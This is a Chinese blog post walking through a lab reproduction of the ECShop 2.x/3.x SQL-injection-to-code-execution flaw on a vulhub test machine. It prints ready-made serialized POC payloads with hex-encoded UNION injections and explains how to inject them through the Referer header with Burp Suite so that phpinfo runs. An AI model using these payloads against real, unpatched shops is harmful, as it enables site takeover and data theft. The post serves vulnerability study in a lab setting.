ECShop 2.x/3.x SQL注入/任意代码执行 漏洞复现

ECShop 2.x/3.x SQL注入/任意代码执行


漏洞原理

ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。
其2017年及以前的版本中,存在一处SQL注入漏洞 ,通过该漏洞可注入恶意数据,最终导致任意代码执行漏洞。其3.6.0最新版已修复该漏洞,vulhub中使用其2.7.3最新版与3.6.0次新版进行漏洞复现。

实验环境

一、靶机:
系统:ubuntu搭建的测试靶场
IP:192.168.88.129
二、攻击机:
系统:win10
IP:192.168.88.137

漏洞环境

启动ecshop:
在这里插入图片描述
环境启动后,可在浏览器页面成功访问http://192.168.88.129:8080/ 与 http://192.168.88.129:8081/,然后进行安装
在这里插入图片描述

漏洞复现

一、利用以下脚本生成POC
在这里插入图片描述
将其放在phpstudy下,访问即可得到2.x和3.x的POC:
在这里插入图片描述
POC for ECShop 2.x: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:“num”;s:107:"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:“id”;s:11:"-1’ UNION/";}554fcae493e564ee0dc75bdf2ebf94ca
POC for ECShop 3.x: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:“num”;s:107:"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:“id”;s:11:"-1’ UNION/";}45ea207d7a2b68c49582d2d22adf953a
注:【POC可以看成是一段验证的代码,就像是一个证据,能够证明漏洞的真实性。】

二、ECShop 2.x进行网站访问,实现漏洞利用
点击登录页面,用burpsuite抓包,发到重发器中:
在这里插入图片描述
将之前生成的POC复制到Referer中,直接在右侧即可看到phpinfo:
在这里插入图片描述
三、ECShop 3.x进行网站访问,实现漏洞利用
点击登录页面(用户中心),用burpsuite抓包,发到重发器中:
在这里插入图片描述
将之前生成的POC复制到Referer中,直接在右侧即可看到phpinfo:
在这里插入图片描述

参考链接:
https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值